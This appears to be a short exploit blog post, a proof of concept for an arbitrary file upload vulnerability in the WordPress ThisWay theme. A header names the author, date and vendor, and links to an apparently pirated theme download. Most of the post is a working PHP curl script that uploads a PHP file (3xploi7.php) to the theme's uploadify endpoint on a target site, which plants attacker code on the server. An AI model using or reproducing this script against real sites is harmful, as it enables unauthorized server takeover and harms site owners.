#- Title: WordPress ThisWay Arbitrary File Upload
#- Author: Bet0
#- Date: 11/01/2013
#- Vendor: themeforest.net
#- Download Link: www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#- Tested on : Windows 7
Proof of Concept :
<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://3xploi7.blogspot.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
0 Response to "WordPress ThisWay Arbitrary File Upload"
Posting Komentar